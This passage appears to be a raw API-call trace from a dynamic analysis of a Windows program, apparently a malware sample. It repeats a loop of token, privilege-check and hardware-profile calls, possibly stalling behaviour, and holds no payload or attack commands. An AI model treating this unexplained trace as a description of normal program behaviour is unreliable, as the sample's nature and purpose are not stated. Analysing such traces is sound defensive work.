pHWProfileInfo=0x0) returned 0x3 [0084.684] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.684] GetCurrentThread () returned 0xfffffffe [0084.684] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.684] GetLastError () returned 0x3f0 [0084.684] GetCurrentProcess () returned 0xffffffff [0084.685] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.685] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.685] SetLastError (dwErrCode=0x522) [0084.685] CloseHandle (hObject=0x114) returned 1 [0084.685] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.685] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.685] GetLastError () returned 0x578 [0084.685] SetLastError (dwErrCode=0x578) [0084.685] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.685] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.685] GetCurrentThread () returned 0xfffffffe [0084.685] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.685] GetLastError () returned 0x3f0 [0084.685] GetCurrentProcess () returned 0xffffffff [0084.685] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.685] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.685] SetLastError (dwErrCode=0x522) [0084.685] CloseHandle (hObject=0x114) returned 1 [0084.685] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.685] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.685] GetLastError () returned 0x578 [0084.685] SetLastError (dwErrCode=0x578) [0084.685] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.685] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.685] GetCurrentThread () returned 0xfffffffe [0084.685] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.685] GetLastError () returned 0x3f0 [0084.685] GetCurrentProcess () returned 0xffffffff [0084.685] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.685] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.685] SetLastError (dwErrCode=0x522) [0084.685] CloseHandle (hObject=0x114) returned 1 [0084.685] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.685] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.685] GetLastError () returned 0x578 [0084.685] SetLastError (dwErrCode=0x578) [0084.685] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.685] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.685] GetCurrentThread () returned 0xfffffffe [0084.685] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.685] GetLastError () returned 0x3f0 [0084.685] GetCurrentProcess () returned 0xffffffff [0084.686] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.686] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.686] SetLastError (dwErrCode=0x522) [0084.686] CloseHandle (hObject=0x114) returned 1 [0084.686] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.686] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.686] GetLastError () returned 0x578 [0084.686] SetLastError (dwErrCode=0x578) [0084.686] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.686] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.686] GetCurrentThread () returned 0xfffffffe [0084.686] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.686] GetLastError () returned 0x3f0 [0084.686] GetCurrentProcess () returned 0xffffffff [0084.686] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.686] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.686] SetLastError (dwErrCode=0x522) [0084.686] CloseHandle (hObject=0x114) returned 1 [0084.686] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.686] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.686] GetLastError () returned 0x578 [0084.686] SetLastError (dwErrCode=0x578) [0084.686] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.686] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.686] GetCurrentThread () returned 0xfffffffe [0084.686] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.686] GetLastError () returned 0x3f0 [0084.686] GetCurrentProcess () returned 0xffffffff [0084.686] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.686] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.686] SetLastError (dwErrCode=0x522) [0084.686] CloseHandle (hObject=0x114) returned 1 [0084.686] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.686] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.686] GetLastError () returned 0x578 [0084.686] SetLastError (dwErrCode=0x578) [0084.686] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.686] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.686] GetCurrentThread () returned 0xfffffffe [0084.686] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.686] GetLastError () returned 0x3f0 [0084.687] GetCurrentProcess () returned 0xffffffff [0084.687] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.687] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.687] SetLastError (dwErrCode=0x522) [0084.687] CloseHandle (hObject=0x114) returned 1 [0084.687] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.687] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.687] GetLastError () returned 0x578 [0084.687] SetLastError (dwErrCode=0x578) [0084.687] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.687] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.687] GetCurrentThread () returned 0xfffffffe [0084.687] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.687] GetLastError () returned 0x3f0 [0084.687] GetCurrentProcess () returned 0xffffffff [0084.687] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.687] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.687] SetLastError (dwErrCode=0x522) [0084.687] CloseHandle (hObject=0x114) returned 1 [0084.687] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.687] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.687] GetLastError () returned 0x578 [0084.687] SetLastError (dwErrCode=0x578) [0084.687] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.687] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.687] GetCurrentThread () returned 0xfffffffe [0084.687] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.687] GetLastError () returned 0x3f0 [0084.687] GetCurrentProcess () returned 0xffffffff [0084.687] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.687] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.687] SetLastError (dwErrCode=0x522) [0084.687] CloseHandle (hObject=0x114) returned 1 [0084.687] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.687] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.687] GetLastError () returned 0x578 [0084.687] SetLastError (dwErrCode=0x578) [0084.687] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.687] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.687] GetCurrentThread () returned 0xfffffffe [0084.687] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.688] GetLastError () returned 0x3f0 [0084.688] GetCurrentProcess () returned 0xffffffff [0084.688] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.688] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.688] SetLastError (dwErrCode=0x522) [0084.688] CloseHandle (hObject=0x114) returned 1 [0084.688] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.688] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.688] GetLastError () returned 0x578 [0084.688] SetLastError (dwErrCode=0x578) [0084.688] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.688] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.688] GetCurrentThread () returned 0xfffffffe [0084.688] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.688] GetLastError () returned 0x3f0 [0084.688] GetCurrentProcess () returned 0xffffffff [0084.688] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.688] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.688] SetLastError (dwErrCode=0x522) [0084.688] CloseHandle (hObject=0x114) returned 1 [0084.688] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.688] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.688] GetLastError () returned 0x578 [0084.688] SetLastError (dwErrCode=0x578) [0084.688] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.688] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.688] GetCurrentThread () returned 0xfffffffe [0084.688] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.688] GetLastError () returned 0x3f0 [0084.688] GetCurrentProcess () returned 0xffffffff [0084.688] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.688] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.688] SetLastError (dwErrCode=0x522) [0084.688] CloseHandle (hObject=0x114) returned 1 [0084.688] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.688] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.688] GetLastError () returned 0x578 [0084.688] SetLastError (dwErrCode=0x578) [0084.688] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.688] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.688] GetCurrentThread () returned 0xfffffffe [0084.688] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.689] GetLastError () returned 0x3f0 [0084.689] GetCurrentProcess () returned 0xffffffff [0084.689] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.689] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.689] SetLastError (dwErrCode=0x522) [0084.689] CloseHandle (hObject=0x114) returned 1 [0084.689] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.689] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.689] GetLastError () returned 0x578 [0084.689] SetLastError (dwErrCode=0x578) [0084.689] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.689] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.689] GetCurrentThread () returned 0xfffffffe [0084.689] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.689] GetLastError () returned 0x3f0 [0084.689] GetCurrentProcess () returned 0xffffffff [0084.689] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.689] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.689] SetLastError (dwErrCode=0x522) [0084.689] CloseHandle (hObject=0x114) returned 1 [0084.689] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.689] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.689] GetLastError () returned 0x578 [0084.689] SetLastError (dwErrCode=0x578) [0084.689] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.689] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.689] GetCurrentThread () returned 0xfffffffe [0084.689] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.689] GetLastError () returned 0x3f0 [0084.689] GetCurrentProcess () returned 0xffffffff [0084.689] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.689] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.689] SetLastError (dwErrCode=0x522) [0084.689] CloseHandle (hObject=0x114) returned 1 [0084.689] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.689] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.689] GetLastError () returned 0x578 [0084.689] SetLastError (dwErrCode=0x578) [0084.689] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.689] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.690] GetCurrentThread () returned 0xfffffffe [0084.690] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.690] GetLastError () returned 0x3f0 [0084.690] GetCurrentProcess () returned 0xffffffff [0084.690] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.690] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.690] SetLastError (dwErrCode=0x522) [0084.690] CloseHandle (hObject=0x114) returned 1 [0084.690] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.690] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.690] GetLastError () returned 0x578 [0084.690] SetLastError (dwErrCode=0x578) [0084.690] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.690] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.690] GetCurrentThread () returned 0xfffffffe [0084.690] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.690] GetLastError () returned 0x3f0 [0084.690] GetCurrentProcess () returned 0xffffffff [0084.690] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.690] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.690] SetLastError (dwErrCode=0x522) [0084.690] CloseHandle (hObject=0x114) returned 1 [0084.690] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.690] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.690] GetLastError () returned 0x578 [0084.690] SetLastError (dwErrCode=0x578) [0084.690] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.690] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.690] GetCurrentThread () returned 0xfffffffe [0084.690] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.690] GetLastError () returned 0x3f0 [0084.690] GetCurrentProcess () returned 0xffffffff [0084.690] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.690] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.690] SetLastError (dwErrCode=0x522) [0084.690] CloseHandle (hObject=0x114) returned 1 [0084.690] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.690] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.690] GetLastError () returned 0x578 [0084.690] SetLastError (dwErrCode=0x578) [0084.690] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.691] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.691] GetCurrentThread () returned 0xfffffffe [0084.691] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.691] GetLastError () returned 0x3f0 [0084.691] GetCurrentProcess () returned 0xffffffff [0084.691] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.691] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.691] SetLastError (dwErrCode=0x522) [0084.691] CloseHandle (hObject=0x114) returned 1 [0084.691] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.691] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.691] GetLastError () returned 0x578 [0084.691] SetLastError (dwErrCode=0x578) [0084.691] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.691] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.691] GetCurrentThread () returned 0xfffffffe [0084.691] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.691] GetLastError () returned 0x3f0 [0084.691] GetCurrentProcess () returned 0xffffffff [0084.691] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.691] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.691] SetLastError (dwErrCode=0x522) [0084.691] CloseHandle (hObject=0x114) returned 1 [0084.691] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.691] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.691] GetLastError () returned 0x578 [0084.691] SetLastError (dwErrCode=0x578) [0084.691] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.691] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.691] GetCurrentThread () returned 0xfffffffe [0084.691] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.691] GetLastError () returned 0x3f0 [0084.691] GetCurrentProcess () returned 0xffffffff [0084.691] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.691] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.691] SetLastError (dwErrCode=0x522) [0084.691] CloseHandle (hObject=0x114) returned 1 [0084.691] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.691] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.691] GetLastError () returned 0x578 [0084.691] SetLastError (dwErrCode=0x578) [0084.691] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.692] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.692] GetCurrentThread () returned 0xfffffffe [0084.692] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 